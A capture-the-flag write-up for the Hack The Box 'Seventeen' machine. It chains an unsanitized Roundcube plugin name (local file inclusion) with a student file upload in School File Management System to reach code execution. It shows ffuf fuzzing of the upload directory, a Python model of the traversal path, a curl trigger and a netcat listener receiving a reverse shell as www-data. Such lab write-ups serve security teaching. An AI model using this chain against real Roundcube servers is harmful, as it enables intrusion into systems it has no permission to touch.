LFI to RCE


Referring to the PoC article found online, the vulnerability is in rcube_plugin_api.php: the plugin name supplied through the "plugins<PLUGIN_NAME>" parameter is not sanitized before it is used to build the plugin's include path, which effectively allows attackers to perform LFI

In order to expand the LFI into RCE, the following two conditions must be met

  • A PHP file containing a payload
  • A directory with the same name as the PHP file (without the extension)

Both are required because Roundcube builds the plugin path as plugins/<name>/<name>.php, so the same name is used once as a directory and once as the file inside it

A PHP file containing a payload can easily be uploaded, with an attacker-controlled filename, via the student endpoint available at http://seventeen.htb:8000/oldmanagement/student_profile.php

A directory that shares the same name is beyond my current privilege, as the mentioned endpoint doesn't support directory creation. Therefore, it is critical to find an existing directory inside the upload directory and name the PHP payload after it

The issue is that I have yet to find out where the uploaded files are stored

School File Management System


As previously confirmed, the target School File Management System instance supports file upload by students. I should be able to abuse this feature to upload a payload here and execute it through the Roundcube endpoint

Hovering over the Download button reveals the link target, but this doesn't show where the file is stored on disk

Source Code Analysis


Since I don't know where the uploaded files are stored in the target School File Management System instance, I need to check the source code to find out

┌──(kali㉿kali)-[~/htb/labs/seventeen/sfms]
└─$ wget https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip ; unzip -q school-file-management-system.zip

The web application itself is an open-source project published on SourceCodester, so I download the source code to Kali

┌──(kali㉿kali)-[~/…/htb/labs/seventeen/sfms]
└─$ ll
total 656K
4.0K drwxr-xr-x 3 kali kali 4.0K Jun 20 05:26  .
4.0K drwxr-xr-x 3 kali kali 4.0K Jun 20 05:19  ..
644K -rw-r--r-- 1 kali kali 641K Jun 20 04:21  school-file-management-system.zip
4.0K drwxr-xr-x 5 kali kali 4.0K Apr  7  2020 'School File Management System'
 
┌──(kali㉿kali)-[~/…/htb/labs/seventeen/sfms]
└─$ cd School\ File\ Management\ System/ ; ll
total 72K
4.0K drwxr-xr-x 3 kali kali 4.0K Jun 20 04:21 ..
4.0K drwxr-xr-x 2 kali kali 4.0K Apr  7  2020 db
4.0K drwxr-xr-x 3 kali kali 4.0K Apr  7  2020 files
8.0K -rw-r--r-- 1 kali kali 6.1K Apr  7  2020 student_profile.php
4.0K -rw-r--r-- 1 kali kali  494 Apr  7  2020 remove_file.php
4.0K -rw-r--r-- 1 kali kali 3.5K Apr  7  2020 student_update.php
4.0K -rw-r--r-- 1 kali kali  986 Apr  7  2020 login.php
4.0K -rw-r--r-- 1 kali kali  568 Apr  7  2020 update_query.php
4.0K drwxr-xr-x 5 kali kali 4.0K Apr  7  2020 .
4.0K -rw-r--r-- 1 kali kali  765 Apr  7  2020 index.php
4.0K -rw-r--r-- 1 kali kali  655 Jan 29  2019 save_file.php
4.0K -rw-r--r-- 1 kali kali  514 Jan 29  2019 download.php
4.0K -rw-r--r-- 1 kali kali  104 Jan 29  2019 validator.php
4.0K -rw-r--r-- 1 kali kali   92 Jan 29  2019 logout.php
4.0K -rw-r--r-- 1 kali kali  278 Jan 29  2019 script.php
4.0K -rw-r--r-- 1 kali kali  597 Jan 29  2019 login_query.php
4.0K drwxr-xr-x 6 kali kali 4.0K Jan 29  2019 admin

The save_file.php file should specify where the web app stores the files uploaded by students

save_file.php


The $location variable is set to files/".$stud_no."/".$file_name. Given that Kelly Shane's student number is 31234, her uploads land in /files/31234/$file_name

Now that I know the location of the uploaded files, I need to find an existing directory there whose name the PHP payload can match

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://seventeen.htb:8000/oldmanagement/files/31234/FUZZ -ic
________________________________________________
 
 :: Method           : GET
 :: URL              : http://seventeen.htb:8000/oldmanagement/files/31234/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
papers                  [Status: 301, Size: 348, Words: 20, Lines: 10, Duration: 96ms]
:: Progress: [220547/220547] :: Job [1/1] :: 417 req/sec :: Duration: [0:08:55] :: Errors: 0 ::

ffuf found a valid directory, /papers, inside /files/31234. This means the PHP payload must be named papers.php to match the directory name

Arbitrary File Upload


The PHP payload, named papers.php, has been uploaded via the student endpoint

RCE


LFI can be achieved through the "plugins<PLUGIN_NAME>" parameter, with "<PLUGIN_NAME>" being attacker-controlled. Because the name is used twice, once as a directory and once as the file inside it, a name that traverses to the upload directory makes the vulnerable web app resolve the include to /var/www/html/oldmanagement/files/31234/papers.php instead of loading a plugin from the papers directory. That's the inclusion bug
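To make the two path constructions concrete, here is an added Python model (not code from this writeup, from Roundcube or from the SFMS project): the save_file.php location string quoted above, and Roundcube's <plugins_dir>/<name>/<name>.php include path from rcube_plugin_api::load_plugin(). The webroot layout, the seven-level traversal string and the throwaway directory tree are assumptions for illustration; the actual request sent to seventeen.htb is not reproduced here.

```python
import os
import posixpath
import tempfile

# Assumed webroot layout (inferred from the URLs in this writeup, not dumped
# from the target): Roundcube under mastermailer, SFMS under oldmanagement.
PLUGINS_DIR = "/var/www/html/mastermailer/plugins"
UPLOAD_BASE = "/var/www/html/oldmanagement"


def upload_location(stud_no: str, file_name: str) -> str:
    """Mirror of $location = "files/".$stud_no."/".$file_name in save_file.php.

    The student controls file_name, extension included, so a .php payload
    lands at a predictable path.
    """
    return f"files/{stud_no}/{file_name}"


def plugin_include_path(plugins_dir: str, plugin_name: str) -> str:
    """Path rcube_plugin_api::load_plugin() builds: <dir>/<name>/<name>.php.

    plugin_name is not sanitized, which is the LFI; note the name appears
    twice, once as a directory component and once as the file inside it.
    """
    return f"{plugins_dir}/{plugin_name}/{plugin_name}.php"


def traversal_name(depth: int, target_without_ext: str) -> str:
    """Hypothetical plugin name: climb to '/' and descend to the payload.

    More '../' than the real depth is harmless because '..' at '/' stays
    at '/', so both copies of the name start over from the root.
    """
    return "../" * depth + target_without_ext.lstrip("/")


def resolved_include(plugins_dir: str, plugin_name: str) -> str:
    """Lexical normalisation of the include path ('/..' collapses to '/')."""
    return posixpath.normpath(plugin_include_path(plugins_dir, plugin_name))


def directory_requirement_demo() -> tuple:
    """Show why a directory named after the payload has to exist.

    Builds a throwaway tree with two uploads: papers.php next to a 'papers'
    directory, and notes.php with no such directory. The kernel resolves
    'X/../X.php' component by component, so 'notes/..' fails with ENOENT
    even though the lexical form points at a file that does exist.
    Returns (resolves_with_dir, resolves_without_dir).
    """
    with tempfile.TemporaryDirectory() as root:
        student_dir = os.path.join(root, "files", "31234")
        os.makedirs(os.path.join(student_dir, "papers"))
        for name in ("papers.php", "notes.php"):
            with open(os.path.join(student_dir, name), "w") as fh:
                fh.write("<?php /* constructed placeholder payload */ ?>\n")
        with_dir = os.path.isfile(
            os.path.join(student_dir, "papers", "..", "papers.php"))
        without_dir = os.path.isfile(
            os.path.join(student_dir, "notes", "..", "notes.php"))
    return with_dir, without_dir


if __name__ == "__main__":
    target = f"{UPLOAD_BASE}/{upload_location('31234', 'papers.php')}"
    name = traversal_name(7, target[:-len(".php")])
    print("plugin name :", name)
    print("include path:", resolved_include(PLUGINS_DIR, name))
    print("papers dir present / absent:", directory_requirement_demo())
```

Run as a script it prints the traversal name, the normalised include path it collapses to, and (True, False) for the directory check on a POSIX host; a legitimate name such as "archive" still resolves to plugins/archive/archive.php, which is the intended behaviour the traversal abuses.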

┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ curl -s http://seventeen.htb:8000/mastermailer/

The payload can then be triggered by loading any endpoint of the web application

┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.165] 43920
socket: Shell has connected! PID: 977
whoami
www-data
hostname
4374220c10d0
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
13: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:11:00:04 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.4/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

I got a shell session. Based on the hostname (a 12-character hex string, as Docker container IDs are) and the 172.17.0.0/16 address (Docker's default bridge network), I'd assume that I am inside a Docker container. Foothold established in a Docker container as the www-data user